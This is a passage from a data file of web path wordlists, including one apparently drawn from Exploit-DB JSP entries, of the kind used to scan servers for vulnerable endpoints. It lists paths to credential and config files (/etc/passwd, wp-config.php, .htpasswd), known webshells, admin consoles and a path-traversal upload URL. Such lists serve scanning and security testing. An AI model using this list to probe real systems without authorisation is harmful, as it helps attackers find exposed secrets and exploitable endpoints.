/application/j_security_check 79 | /applications/applications.jsf 80 | /applications/lifecycleModulesNew.jsf 81 | /auth.w 82 | /auth.xsl 83 | /axis/tt_pm4l.jws 84 | /axis2/axis2-admin/engagingglobally 85 | /base-dir/access/stafffile 86 | /bin/test.txt 87 | /bindings.yaws 88 | /carbo.dll 89 | /cd/../config/html/cnf_gi.htm 90 | /cfdocs/expeval/ExprCalc.cfm 91 | /cgi-bin/ExportSettings.sh 92 | /cgi-bin/ServerView/ 93 | /cgi-bin/admin/upgrade.cgi 94 | /cgi-bin/cvename.cgi 95 | /cgi-bin/db2www/ 96 | /cgi-bin/db2www/library/document.d2w/show 97 | /cgi-bin/db4web_c/dbdirname/etc/hosts 98 | /cgi-bin/ezshopper2/loadpage.cgi 99 | /cgi-bin/ezshopper3/loadpage.cgi 100 | /cgi-bin/loadpage.cgi 101 | /cgi-bin/main-cgi 102 | /cgi-bin/mj_wwwusr 103 | /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report 104 | /cgi-bin/php/lang_change.php 105 | /cgi-bin/rwcgi60 106 | /cgi-bin/rwcgi60/showenv 107 | /cgi-bin/script.cgi 108 | /cgi-bin/suche/hsx.cgi 109 | /cgi-bin/system.conf 110 | /cgi-bin/w3-msql/protected-directory/.htpasswd 111 | /cgi-bin/w3-msql/protected-directory/private-file 112 | /cgi-bin/webif/download.sh 113 | /cgi-bin/webif/status-processes.sh 114 | /cgi-bin/webif/system-acl.sh 115 | /cgi-bin/webif/system-crontabs.sh 116 | /cgi-bin/webif/system-services.sh 117 | /cgi-bin/webif/system-startup.sh 118 | /cgi-bin/webwho.pl 119 | /cgi-bin/whois_raw.cgi 120 | /cgi-bin/wrap 121 | /cgi/bin/test.txt 122 | /cgi/conf.bin 123 | /chat/!nicks.txt 124 | /chat/!pwds.txt 125 | /chat/data/usr 126 | /cmsms/admin 127 | /config.php 128 | /config.w 129 | /config/html/cnf_gi.htm 130 | /configuration.yaws 131 | /configuration/auditModuleEdit.jsf 132 | /configuration/configuration.jsf 133 | /configuration/httpListenerEdit.jsf 134 | /connectedNodes.ovpl 135 | /console/portal/ 136 | /console/portal/Server/Monitoring 137 | /console/portal/Server/Shutdown 138 | /consolehelp/console-help.portal 139 | /cookiez.php 140 | /csvn/login 141 | /ctx/index 142 | /current_config/Account1 143 | /current_config/passwd 144 | /customMBeans/customMBeans.jsf 145 | /dav_portal 146 | /dav_public 147 | /debug/dbg 148 | /debug/echo 149 | /debug/errorInfo 150 | /debug/showproc 151 | /decoding/index.php 152 | /demantra/common/loginCheck.jsp/../../GraphServlet 153 | /demo-servlets/%2fWEB-INF/config/mishka.properties 154 | /demo-servlets/WEB-INF/config/mishka.properties 155 | /demo-servlets/snoop.jsp 156 | /dm/demarc 157 | /dms0 158 | /dmsoc4j/AggreSpy 159 | /docs/bind9dns.html 160 | /doku.php 161 | /dvrcontrol.cgi 162 | /echo2 163 | /ejs/ 164 | /em/dynamicImage/emSDK/chart/EmChartBean 165 | /en-GB/account/login 166 | /en-US/splunkd/__raw/services/server/info/server-info 167 | /error 168 | /error_box.html 169 | /etc/loginerror.html 170 | /etc/passwd 171 | /example.com/wa/auth 172 | /example/ 173 | /exampleext/control/main 174 | /examples/jsp/num/numguess.js 175 | /examples/jsp/snp/anything.snp 176 | /examples/jsp/source.jsp 177 | /examples/servlets/servlet/CookieExample 178 | /examples/snp/snoop.jsp 179 | /exec/authenticate 180 | /exec/show/config/cr 181 | /exportFile 182 | /faces/javax.faces.resource/web.xml 183 | /file.asp 184 | /flash/addcrypted2 185 | /flv8/player.php 186 | /flv8/popup.php 187 | /fly2.pn 188 | /forms90/f90servlet 189 | /frontend/x3/stats/lastvisit.html 190 | /getsource.jsp 191 | /goform/WizardHandle 192 | /gsdl/cgi-bin/library.cgi 193 | /gsdl/etc/error.txt 194 | /gsdl/etc/key.db 195 | /gsdl/etc/users.db 196 | /gui/ 197 | /gui/index.html 198 | /help/ 199 | /help/advanced/searchView.jsp 200 | /help/advanced/workingSetManager.jsp 201 | /help/readme.nsf/Header 202 | /help/sm/en/Output/wwhelp/wwhimpl/js/html/index_main.htm 203 | /homebet/homebet.dll 204 | /host-manager/html/add 205 | /httpDisabled.shtml 206 | /ibm/console/ 207 | /idm/login.jsp 208 | /idm/questionLogin.jsp 209 | /ifx/ 210 | /iissamples/exair/howitworks/codebrws.asp 211 | /image_importer.php 212 | /image_uploads/webshell.php 213 | /imc/login.jsf 214 | /incl/image_test.shtml 215 | /includes/global.inc 216 | /index.exp 217 | /index.htm 218 | /index.jsp 219 | /index.php 220 | /index.php/frontend/myprofile/en 221 | /index.php3 222 | /index.shtml 223 | /index.wkf 224 | /info.php 225 | /isqlplus 226 | /j_security_check 227 | /jde/E1Menu.maf 228 | /jde/E1Menu_Menu.mafService 229 | /jde/E1Menu_OCL.mafService 230 | /jde/JASMafletMafBrowserClose.mafService 231 | /jde/MafletClose.mafService 232 | /jhttpd/ 233 | /jira/secure/attachment/ 234 | /jsp-examples/cal/cal2.jsp 235 | /jsptest.jsp 236 | /level/ 237 | /level/$n/exec/ 238 | /level/$n/exec/show%20conf 239 | /login.html 240 | /login.jsp 241 | /login.php 242 | /lua/network_load.lua 243 | /mail/feed/atom 244 | /mail/x.nsf/CalendarFS 245 | /mail/x.nsf/ToDoFS 246 | /mail/x.nsf/WebInteriorCalendarFS 247 | /mail/x.nsf/WebInteriorToDoFS 248 | /main.nsf/h_Toc/2a922d48c75dd00b052567080016723a/ 249 | /main/web/config/alarming.schedule 250 | /main/web/config/conf.modules 251 | /mainFrame.htm 252 | /mantisbt/ 253 | /menu.env 254 | /miniwebserver/ 255 | /mj_wwwusr 256 | /moab/MOAB-01-01-2007.html 257 | /monitor/m_overview.ink 258 | /msadc/Samples/SELECTOR/showcode.asp 259 | /msg_viewer_user_mail.html 260 | /msgserver/html/group 261 | /myapp/MyCookies 262 | /myasp.asp::$DATA 263 | /mywebapp/logout/spring-security-redirect 264 | /nagios/cgi-bin/config.cgi 265 | /nagiosxi/account/ 266 | /nagiosxi/admin/users.php 267 | /nagiosxi/includes/components/massacknowledge/mass_ack.php 268 | /nagiosxi/includes/components/xicore/recurringdowntime.php 269 | /nagiosxi/includes/components/xicore/status.php 270 | /nagiosxi/login.php 271 | /nagiosxi/reports/alertheatmap.php 272 | /nagiosxi/reports/histogram.php 273 | /nagiosxi/reports/myreports.php 274 | /nagiosxi/reports/notifications.php 275 | /nagiosxi/reports/statehistory.php 276 | /names.nsf 277 | /opennms/event/query 278 | /opt/omni/lbin/ 279 | /opt/splunk 280 | /oradb 281 | /page.jsp 282 | /pages/viewpage.action 283 | /payload.dtd 284 | /pbx/gate 285 | /perl-status 286 | /phonebook/contact_list_data 287 | /php/admin_update_program.php 288 | /php/wcs_bwlists_handler.php 289 | /phpinfo.php 290 | /pls/ 291 | /pls/MSBEP004/ 292 | /pls/TEST/oracleconfigure.customize 293 | /pls/[DADName]/icx_define_pages.DispPageDialog 294 | /pls/[DADName]/icx_define_pages.editpagelist 295 | /pls/[DADName]/oracleconfigure.customize 296 | /pls/otn/f 297 | /pls/otn/wwv_flow.accept 298 | /pls/portal/PORTAL.wwv_main.render_warning_screen 299 | /portal/page 300 | /portal_top.html 301 | /post-a-job/ 302 | /prestashop/admin177chuncw/ 303 | /projects/eumrv/app/ 304 | /proxy/0/ 305 | /proxy/smhui/getuiinfo 306 | /pservlet.html 307 | /pub/english.cgi 308 | /qcbin/servlet/tdservlet/TDAPI_GeneralWebTreatment 309 | /qcenter/hawkeye/v1/account?_dc=1519932315271 310 | /qcenter/hawkeye/v1/date_config 311 | /qcenter/hawkeye/v1/network_config 312 | /qcenter/hawkeye/v1/ssh_setting_config 313 | /qwe/qwe/qwe/index.html 314 | /rebinder.html 315 | /recordings/index.php 316 | /recordings/misc/audio.php 317 | /red2301.html 318 | /report/mnAozbpC 319 | /reports/rwservlet 320 | /reports/rwservlet/parsequery 321 | /reports/rwservlet/showenv 322 | /reports_mta_queue_status.html 323 | /research-free-solutions.php. 324 | /resourceNode/customResourceNew.jsf 325 | /resourceNode/externalResourceNew.jsf 326 | /resourceNode/jdbcConnectionPoolNew1.jsf 327 | /resourceNode/jdbcResourceEdit.jsf 328 | /resourceNode/jdbcResourceNew.jsf 329 | /resourceNode/jmsConnectionNew.jsf 330 | /resourceNode/jmsDestinationNew.jsf 331 | /resourceNode/resources.jsf 332 | /rest/v1/AccountService/Account 333 | /rodrigo 334 | /rokform/SysDataDetail 335 | /rss/1.0/modules/content/ 336 | /safari/safari2.html 337 | /samples/view-source 338 | /sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm 339 | /sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm 340 | /scgi-bin/platform.cgi 341 | /script.php 342 | /scripts/db4web_c.exe 343 | /scripts/dbman/db.cgi 344 | /scripts/wgate.dll 345 | /scripts/wgate/ 346 | /scripts/wgate/pbw2/ 347 | /sdn/ui/app/login 348 | /sdn/ui/app/rs/hpws/config 349 | /search 350 | /search/document.do 351 | /search/query/search 352 | /search97.vts 353 | /secure/embedded/builtin 354 | /sendrcpackage?keyid=-2544&keysymbol=-4081 355 | /server-status 356 | /service/graph_html.php 357 | /services/server/info/server-info 358 | /servlet/com.livesoftware.jrun.plugins.jsp.JSP 359 | /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter 360 | /servlet/custMsg 361 | /servlet/file/login.jsp 362 | /servlet/jsp 363 | /servlet/one2planet.infolet.InfoServlet 364 | /servlet/pagecompile._admin._SELogging_xjsp 365 | /servlet/pagecompile._admin._dataSources_xjsp 366 | /servlet/pagecompile._admin._debug_xjsp 367 | /servlet/pagecompile._admin._help._helpContent_xjsp 368 | /servlet/pagecompile._admin._login_xjsp 369 | /servlet/pagecompile._admin._optionalPackages_xjsp 370 | /servlet/pagecompile._admin._userMgt_xjsp 371 | /servlet/pagecompile._admin._virtualServers_xjsp 372 | /servlet/pagecompile._admin._vmSystemProperties_xjsp 373 | /servlet/ssifilter/../../filename 374 | /servlet/sunexamples.RealmDumpServlet 375 | /servlet/traveler 376 | /servlets-examples/servlet/CookieExample 377 | /servlets/gnujsp/[dirname]/[file] 378 | /session/pagecount 379 | /session_login.cgi 380 | /shell/index.cgi 381 | /showfile.asp 382 | /sipssys/users/ 383 | /someApp/javax.faces.resource.../WEB-INF/web.xml.jsf 384 | /someApp/javax.faces.resource./WEB-INF/web.xml.jsf 385 | /status 386 | /status.xsl 387 | /stconf.nsf 388 | /stconf.nsf/WebMessage 389 | /struts-virtdir 390 | /struts2-blank-2.0.11.1/struts.. 391 | /struts2-blank/home.action 392 | /struts2-showcase/fileupload/upload.action 393 | /struts2-showcase/modelDriven/modelDriven.action 394 | /support/docview.wss 395 | /support/kb/doc.php 396 | /support/messages 397 | /sx-users 398 | /sysnet/registration.jsf 399 | /test.php 400 | /test/jsp/buffer1.jsp 401 | /test/jsp/buffer2.jsp 402 | /test/jsp/buffer3.jsp 403 | /test/jsp/buffer4.jsp 404 | /test/jsp/comments.jsp 405 | /test/jsp/declaration/IntegerOverflow.jsp 406 | /test/jsp/extends1.jsp 407 | /test/jsp/extends2.jsp 408 | /test/jsp/pageAutoFlush.jsp 409 | /test/jsp/pageDouble.jsp 410 | /test/jsp/pageExtends.jsp 411 | /test/jsp/pageImport2.jsp 412 | /test/jsp/pageInfo.jsp 413 | /test/jsp/pageInvalid.jsp 414 | /test/jsp/pageIsErrorPage.jsp 415 | /test/jsp/pageIsThreadSafe.jsp 416 | /test/jsp/pageLanguage.jsp 417 | /test/jsp/pageSession.jsp 418 | /test/realPath.jsp 419 | /tftp/fetch_boot_file 420 | /tmp/ 421 | /tomcat-docs/appdev/sample/web/hello.jsp 422 | /tools.html 423 | /tools/checksec.sh 424 | /top.html?page=main&productboardtype= 425 | /transmission/rpc 426 | /ts_xek.php 427 | /ui/dboard/settings/management//telnetserver 428 | /ui/dboard/settings/proxy//rtsp 429 | /ui/dboard/storage/storageusers 430 | /ui/sb 431 | /unauthenticated/ 432 | /upload.html 433 | /users.conf 434 | /usr/bin/id 435 | /utorrent-crash-test.html 436 | /var/lib/sdn/uploads/ 437 | /var/www/gitlist/cache 438 | /vdb/ 439 | /vdb/bottom.html 440 | /view/viewer_index.shtml 441 | /w.php 442 | /webService/webServicesGeneral.jsf 443 | /web_caps/webCapsConfig 444 | /webcacheadmin 445 | /webconsole/faces/faces/faces/jsf/tips.jsp 446 | /webdist.cgi 447 | /webrtc-from-chat/index.html 448 | /webshell.php 449 | /webtools/control/EntitySQLProcessor 450 | /webtools/control/UpdateGeneric 451 | /webtools/control/scheduleService 452 | /webviewer/gw.dat 453 | /webviewer/netinfo.dat 454 | /wf-NAME/social/api/feed/aggregation/201803310000 455 | /widget/inc/widget_package_manager.php 456 | /widget/repository/db/sqlite/tmwf.db 457 | /widget/repository/inc/class/common/crypt/crypt.key 458 | /widget/repository/log/diagnostic.log 459 | /wls-wsat/CoordinatorPortType 460 | /wp-config.php 461 | /www/cgi-bin/system.conf 462 | /xampp/phonebook.php 463 | /xampp/showcode.php 464 | /zport/dmd/Devices/devices/manage_doUserCommand 465 | /zport/dmd/ZenUsers/admin 466 | /zport/dmd/userCommands/ping 467 | /{name}_b2b/CatalogClean.do 468 | /{name}_b2b/ForwardDynamic.do 469 | /{name}_b2b/IbaseSearchClean.do 470 | /{name}_b2b/initProductCatalog.do 471 | /~breadbox/software/tiny/teensy.html 472 | /~ksv/ 473 | /~m-mat/MT/efaq.html 474 | /~meder 475 | -------------------------------------------------------------------------------- /exploitdb_jsp.txt: -------------------------------------------------------------------------------- 1 | /exchange/servlet/ADSHACluster 2 | /ACSServer/UploadFileServlet 3 | /ACSServer/messagebroker/amf 4 | /AddEditJob.do 5 | /AddMail.ve 6 | /AddUser.do 7 | /AdventNetServiceDeskWC.ear/AdventNetServiceDesk.war 8 | /Aris/wflogin.jsp 9 | /AttachFile!default.jspa 10 | /BPELConsole/default/processLog.jsp 11 | /BWT/utils/logs/read_log.jsp 12 | /ChangeRoles.ve 13 | /DetailedLogReader.jsp 14 | /ESAdmin/jsp/tabview.jsp 15 | /ESClient/jsp/customizedialog.jsp 16 | /EditUser.do 17 | /Esprit/ES/Login 18 | /Esprit/public/Login.jsp 19 | /Esprit/public/Password.jsp 20 | /EspritEngine/JMFProcessor.html/servlet/etwistrepository 21 | /EyrAPI/EyrAPIConfiguration/EyrAPIConfigurationIf 22 | /FetchFile 23 | /GKEY= ext:do 24 | /GroupResourcesDef.do 25 | /HomePage.do 26 | /HomePage.do HTTP/1.0 27 | /IMS-AA-IDP/common/scripts/calendar/ipopeng.htm 28 | /IMS-AA-IDP/common/scripts/iua/pmfso.swf 29 | /Inventory 30 | /JSPMyAdmin/ 31 | /JSPMyAdmin/deletedata.jsp 32 | /JSPMyAdmin/drop.jsp 33 | /JSPMyAdmin/export.jsp 34 | /JSPMyAdmin/query.jsp 35 | /JSPMyAdmin/right.jsp 36 | /JSPMyAdmin/tabledata.jsp 37 | /JSPWikiPath/Edit.jsp 38 | /Jplayer.swf 39 | /KK_LS9ReportingPortal/GetData 40 | /LicenseAgreement.do 41 | /LiveTime/WebObjects 42 | /LiveTime/WebObjects/LiveTime.woa 43 | /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile 44 | /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadLogFiles 45 | /LiveTime/WebObjects/LiveTime.woa/wo/18.0.53.21.0.4.1.3.0.1 46 | /LiveTime/WebObjects/LiveTime.woa/wo/7.0.53.19.0.2.7.0.3.0.0.1 47 | /LoginProcessing.jsp 48 | /ManualNodeAddition.do 49 | /MimeBuilderConfig.do 50 | /OA_HTML/RF.jsp 51 | /OA_HTML/cabo/jsps/a.jsp 52 | /OA_HTML/iesfootprint.jsp 53 | /OpenKM/admin/scripting.jsp 54 | /RF.jsp 55 | /RSA%20Authentication%20Manager%208.2.1.4.0-build1394922 56 | /ReadMessage.jsp 57 | /ReqWebHelp/advanced/workingSet.jsp 58 | /ReqWebHelp/basic/searchView.jsp 59 | /Resource.do 60 | /ResourceHub.do 61 | /Search.jsp 62 | /SecureSphere/j_acegi_security_check 63 | /SecureSphere/plain/actionsets.html 64 | /SecureSphere/secsphLogin.jsp 65 | /SecureSphere/ui/main.html 66 | /SetUpWizard.do 67 | /SiteDef.do 68 | /TbsmWebConsole/help/en/jsp/apwc_win_main.jsp 69 | /ViewAction 70 | /ViewIssue.jspa 71 | /Web/SA/SaveConfiguration.do 72 | /Web/SA2/ScriptList.do 73 | /Web/SA3/AddHoliday.do 74 | /WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile 75 | /WebObjects/LiveTime.woa/wa/DownloadAction/downloadLogFiles 76 | /WorkOrder.do 77 | /ZCMS_1.1/ZCMS_1.1/index.jsp 78 | /admin/ 79 | /admin/config/Config.do 80 | /admin/edituser2.jsp 81 | /admin/login.jsp 82 | /admin/role/RoleAdmin.do 83 | /admin/staticexport2.jsp 84 | /admin/user/UserAdmin.do 85 | /advisories.php 86 | /agentUpload 87 | /alerts/Config.do 88 | /algopds/rcore6/main/browse.jsp 89 | /algopds/rcore6/main/ibrowseheader.jsp 90 | /appServer/jvmReport.jsf 91 | /appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report 92 | /application/saveUser.do 93 | /applications/upload.jsf 94 | /applications/upload.jsf?appType=webApp 95 | /applications/webApplications.jsf 96 | /apps/selfService/resetPasswordOptions.jsp 97 | /asintsov 98 | /audit-policy.jsp 99 | /authUserAction!edit.action 100 | /authentication/logon.html 101 | /automation/batch/upload 102 | /available-plugins.jsp 103 | /baseAction!getPageXML.action 104 | /bb.sqljsp 105 | /bcc/authdblookup-input.jsp 106 | /bcc/editdevices.jsp 107 | /bcc/main.jsp 108 | /bin/sh 109 | /bmc_help2u/help_services/html 110 | /bmc_help2u/help_servicessetChromeDef.jsp 111 | /bmc_help2u/servlet/helpServlet2u 112 | /bonita/login.jsp 113 | /bonita/portal/themeResource 114 | /brightmail/action1.do 115 | /broadware.jsp 116 | /bsmdashboards/messagebroker/amfsecure 117 | /bugzero/jsp/edit.jsp 118 | /bugzero/jsp/query.jsp 119 | /carbon/entitlement/eval-policy-submit.jsp 120 | /carbon/identity-mgt/challenges-mgt.jsp 121 | /carbon/identity-mgt/challenges-set-mgt.jsp 122 | /carbon/log-view/downloadgz-ajaxprocessor.jsp 123 | /carbon/ndatasource/newdatasource.jsp 124 | /carbon/ndatasource/validateconnection-ajaxprocessor.jsp 125 | /carbon/server-admin/proxy_ajaxprocessor.jsp 126 | /carbon/viewflows/handlers.jsp 127 | /carbon/webapp-list/webapp_info.jsp 128 | /category/custom.jsp 129 | /ccmcip/xmldirectorylist.jsp 130 | /checkForUpdates.do 131 | /classifier/ruleset.jsp 132 | /client-connections-settings.jsp 133 | /clusterframe.jsp 134 | /cmd.war 135 | /cmdshell.jsp 136 | /com_sun_webui_jsf/help/helpwindow.jsf 137 | /common/UpdateField.jsp 138 | /common/appServer/jvmReport.jsf 139 | /common/appServer/jvmReport.jsf?pageTitle=JVM%20Report 140 | /common/appServer/jvmReport.jsf?reportType=summary&instanceName=server 141 | /common/applications/applications.jsf 142 | /common/applications/uploadFrame.jsf 143 | /common/index.jsf 144 | /community/blog.jsp 145 | /config,alert.jsp 146 | /config,redirection.jsp 147 | /config,zone_transfer.jsp 148 | /configuration.jsp 149 | /connection-settings-external-components.jsp 150 | /console/Highlander_docs/SSO-Error.jsp 151 | /console/Login.jsp 152 | /console/a 153 | /console/login/LoginForm.jsp 154 | /contents/ 155 | /contents/service/homepage 156 | /contents/service/homepage 157 | /contents/|2C6B33BED38F825C48AE73C093241510|com.ca.arcflash.ui.client.homepage.HomepageService 158 | /cookie/ 159 | /corporate/webpages/dashboard/ApplianceInformation.jsp 160 | /corporate/webpages/dashboard/HTTPVirusDetected.jsp 161 | /corporate/webpages/dashboard/IPSRecentAlerts.jsp 162 | /corporate/webpages/dashboard/LicenseInformation.jsp 163 | /corporate/webpages/index.php 164 | /crowd/services/test 165 | /dalimws/admin 166 | /dalimws/controller 167 | /dalimws/log 168 | /dalimws/xui 169 | /data/iaccess/AccHolidays/_new_/ 170 | /desk#Form/Asset%20Repair/ARLOG-000015 171 | /directory/jsp/file.jsp 172 | /domainServlet/AJaxDomainServlet 173 | /domjava/ 174 | /downTimeScheduler.do 175 | /downloadCSV.jsp 176 | /dwr/call/plaincall/EventHandlersDwr.testProcessCommand.dwr 177 | /dwr/call/plaincall/UsersDwr.saveUserAdmin.dwr 178 | /dwr/exec/downloader.installPlugin.dwr 179 | /dwr/index.html 180 | /eb5b2052fc6c2f6252af578bb9a66cf3.jsp 181 | /editAccount.html 182 | /editPolicy.jsp 183 | /elasticpath_dir/manager/fileManager.jsp 184 | /elasticpath_dir/manager/getImportFileRedirect.jsp 185 | /emailSearch.jsp 186 | /emm_webservice 187 | /error/500error.jsp 188 | /esbus/servlet/GetSQLData 189 | /event/index2.do 190 | /event/runQuery.do 191 | /examples/jsp/cal/cal2.jsp 192 | /examples/tictactoe/tictactoe.jsp 193 | /examplesWebApp/InteractiveQuery.jsp 194 | /express/showNotice.do 195 | /filemanager/upload/uploadfile-finish.html 196 | /files/download/WEB-INF/users/admin.xml 197 | /forum/bookmarks/insert/2/1.page 198 | /frmServer.jsp 199 | /ges/webapp/users/blhistory.jsp 200 | /ges/webapp/users/prhistory.jsp 201 | /ges/webapp/users/prnow.jsp 202 | /gespage 203 | /gespage/ 204 | /gespage/users/prnow.jsp 205 | /gespage/webapp/users/prnow.jsp 206 | /gespage/webapp/users/prnow.jsp 207 | /ghboard/component/flashupload/data 208 | /ghboard/component/flashupload/download.jsp 209 | /graphicalViewsBackgroundUpload 210 | /group-create.jsp 211 | /group-delete.jsp 212 | /group-edit.jsp 213 | /group-summary.jsp 214 | /hipergate/admin/sql.htm 215 | /hipergate/common/errmsg.jsp 216 | /hqu/health/health/printReport.hqu 217 | /idm/account/findForSelect.jsp 218 | /idm/admin/changeself.jsp 219 | /idm/help/index.jsp 220 | /idm/login.jsp 221 | /idm/user/main.jsp 222 | /images/boot.ini 223 | /images/passwd.txt 224 | /import-keystore-certificate.jsp 225 | /inline/WorkOrder/2/1340090056957.txt 226 | /intruvert/jsp/module/Login.jsp 227 | /intruvert/jsp/reports/reports-column-center.jsp 228 | /intruvert/jsp/systemHealth/SystemEvent.jsp 229 | /j_acegi_security_check 230 | /jira/secure/BrowseProject.jspa 231 | /jiveforums/ 232 | /jiveforums/servlet/JiveServlet 233 | /jmx-console/ 234 | /jmx-console/HtmlAdaptor 235 | /jreport/jinfonet/dealSchedules.jsp 236 | /jsp/About.jsp 237 | /jsp/UploadImage.jsp 238 | /jsp/common/system/debug.jsp 239 | /jsp/reports/ReportsAudit.jsp 240 | /jsp/xmlhttp/AjaxResponse.jsp 241 | /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp 242 | /jsps/genrequest.jsp 243 | /jspsnoop 244 | /keymanserverconfig.jsp 245 | /launch.jsp 246 | /log.jsp 247 | /logConfiguration.do 248 | /logConfiguration.jsp 249 | /logViewer/logViewer.jsf 250 | /logeye/tasks/xpotaskDefinitionAction.jsp 251 | /logeye/testingus.txt 252 | /login.htm 253 | /login.jsp 254 | /login_post.jsp 255 | /manage 256 | /manage-updates.jsp 257 | /manager/jmxproxy/ 258 | /mastheadAttach.do 259 | /maximo/report 260 | /mcafee/log.cgi 261 | /meshcms/admin/login.jsp 262 | /mimebuilderconfig.jsp 263 | /mmc-3.5.1/com.mulesoft.mmc.MMC/ 264 | /mmc-3.5.1/handler/securityService.rpc 265 | /mmc-3.5.1/index.jsp 266 | /mmc/com.mulesoft.mmc.MMC/ 267 | /mmc/handler/securityService.rpc 268 | /mmc/index.jsp 269 | /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp 270 | /mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp 271 | /mobiledoc/jsp/ccmr/clientPortal/login.jsp 272 | /module/download/downfile.jsp 273 | /modules/graphicalViews/web/graphicalViewUploads/ 274 | /modules/graphicalViews/web/graphicalViewUploads/17.jsp 275 | /monitor/logselect.php 276 | /msg.jsp 277 | /muc-room-delete.jsp 278 | /muc-room-edit-form.jsp 279 | /muc-service-edit-form.jsp 280 | /muc-service-edit-form.jsp 281 | /neonwebmail/addrlist 282 | /neonwebmail/downloadfile 283 | /neonwebmail/maillist 284 | /neonwebmail/updatemail 285 | /neonwebmail/updateuser 286 | /netflow/jspui/appConfig.jsp 287 | /netflow/jspui/applicationList.jsp 288 | /netflow/jspui/customReport.jsp 289 | /netflow/jspui/index.jsp 290 | /netflow/jspui/selectDevice.jsp 291 | /nidp/jsp/x509err.jsp 292 | /nnm/mibdiscover 293 | /nnm/protected/configurationpoll.jsp 294 | /nnm/protected/statuspoll.jsp 295 | /nps/servlet/webacc 296 | /nxserver/nuxeo.war/shell.jsp 297 | /olt/pages/webshell.jsp 298 | /omnidocs/ForceChangePassword.jsp 299 | /omnidocs/doccab/doclist.jsp 300 | /omnidocs/doccab/userprofile/editprofile.jsp 301 | /opencms/opencms/system/workplace/admin/workplace/logfileview/downloadTrigger.jsp 302 | /opencms/opencms/system/workplace/editors/editor.jsp 303 | /opencms/opencms/system/workplace/views/admin/admin-main.jsp 304 | /opencms/opencms/system/workplace/views/explorer/tree_files.jsp 305 | /opencms/system/workplace/admin/accounts/users_list.jsp 306 | /openedit/authentication/logon.html 307 | /opennms/event/list 308 | /opennms/j_acegi_security_check 309 | /opennms/notification/list.jsp 310 | /opt/SecureSphere/server/SecureSphere/jakarta-tomcat-secsph/webapps/SecureSphere/WEB-INF/reptempt/25CB2F79E342E89AD9A7CFF51AA17F10/1338152502622932642/export.imf 311 | /opt/tomcat/webapps/ROOT/pepito.jsp 312 | /pages/ucquerydetails.jsp 313 | /pages/ucschcancelproc.jsp 314 | /pagesUTF8/Sys_DirAnzeige.jsp 315 | /pagesUTF8/auftrag_allgemeinauftrag.jsp 316 | /pagesUTF8/auftrag_job.jsp 317 | /payload.dtd 318 | /pe/repository/displaydeletenavigator.jsp 319 | /pe/repository/displaynavigator.jsp 320 | /pe/repository/include/renamepopup.jsp 321 | /pentaho-style/active/default.css 322 | /pentaho/Login 323 | /pentaho/ViewAction 324 | /pepito.jsp 325 | /plugin-admin.jsp 326 | /plugins/bookmarks/create-bookmark.jsp 327 | /plugins/clientcontrol/create-bookmark.jsp 328 | /plugins/clientcontrol/permitted-clients.jsp 329 | /plugins/clientcontrol/spark-form.jsp 330 | /plugins/search/advance-user-search.jsp 331 | /plugins/search/search-props-edit-form.jsp 332 | /policies.jsp 333 | /portal/Loading.jsp 334 | /portal/Login.jsp 335 | /portal/page 336 | /protected/ping.jsp 337 | /protected/traceroute.jsp 338 | /reg-settings.jsp 339 | /register.jsp 340 | /report/daily.jsp 341 | /report/reportViewAction.jsp 342 | /reports/CreateReportTable.jsp 343 | /reports/examples/Tools/test.jsp 344 | /reports/flash/details.jsp 345 | /resin-doc/viewfile/ 346 | /resource/application/Inventory.do 347 | /rest/v1/users.json 348 | /reverse.pl 349 | /revize/HTTPTranslatorServlet 350 | /revize/conf/revise.xml 351 | /revize/debug/query_results.jsp 352 | /ricos/ricos470/Executer 353 | /ricos470/Executer 354 | /ricos470/classes/ 355 | /ricos470/rcore6/frameset.jsp 356 | /ricos470/rcore6/main/addcookie.jsp 357 | /ricos470/rcore6/main/buttonset.jsp 358 | /ricos470/rcore6/main/showerror.jsp 359 | /rkm/AttachmentServlet 360 | /rkm/external.jsp 361 | /rkm/index.jsp 362 | /rkm/search.jsp 363 | /rkm/usersettings.jsp 364 | /rkm/viewdoc.jsp 365 | /robohelp/robo/reserved/web/%s/test.jsp 366 | /robohelp/robo/reserved/web/test.jsp 367 | /robohelp/server 368 | /robohelp/server?PUBLISH=1 369 | /roleManager.jsp 370 | /roma/jsp/debug/debug.jsp 371 | /roma/jsp/volsc/monitoring/dev_services.jsp 372 | /roma/system/cntl 373 | /sas5/index.jsp 374 | /scheduleresult.de 375 | /search.jsp 376 | /search/document.do 377 | /secfi_update1.2.3.4.sh 378 | /secsphLogin.jsp 379 | /secure/EditField.jspa 380 | /secure/IssueNavigator.jspa 381 | /secure/UpdateFieldJson.jspa 382 | /security-audit-viewer.jsp 383 | /sendio/ice/cmd/msg/body 384 | /server-properties.jsp 385 | /server-props.jsp 386 | /server-session-details.jsp 387 | /server2server-settings.jsp 388 | /servlet/AJaxServlet 389 | /servlet/AJaxServlet?action=checkUser&search=guest 390 | /servlet/ConsoleServlet 391 | /servlet/Installer 392 | /servlet/JiveServlet 393 | /servlet/MGConfigData 394 | /servlet/actions/merge-viewer/login 395 | /servlet/actions/merge-viewer/summary 396 | /servlet/downloadReport 397 | /servlets/FetchFile 398 | /servlets/FileUploadServlet 399 | /servlets/FileUploadServlet?fileName=../jsp/Login.jsp 400 | /servlets/GetChallengeServlet 401 | /setup/setup-/ 402 | /sgms/auth 403 | /sgms/createNewThreshold.jsp 404 | /sgms/ematStaticAlertTypes.jsp 405 | /sgms/panelManager 406 | /snoop.jsp 407 | /sqlConsole.shtm 408 | /ssgmanager/jsp/readaccess/ping.jsf 409 | /ssgmanager/jsp/writeaccess/SystemUpdate.jsf 410 | /ssgmanager/ssgimages 411 | /sslvpn/applet_agent.jsp 412 | /status 413 | /status/mango.json 414 | /swDashboard/pEdit/pinEditor.jsp 415 | /swf/flashreport.swf 416 | /swql.jsp 417 | /swr.jsp 418 | /sys/sys/listaBD2.jsp 419 | /sysaid/CustomizeListView.jsp 420 | /system-email.jsp 421 | /tc/contents/home001.jsp 422 | /test 423 | /tmui/Control/form 424 | 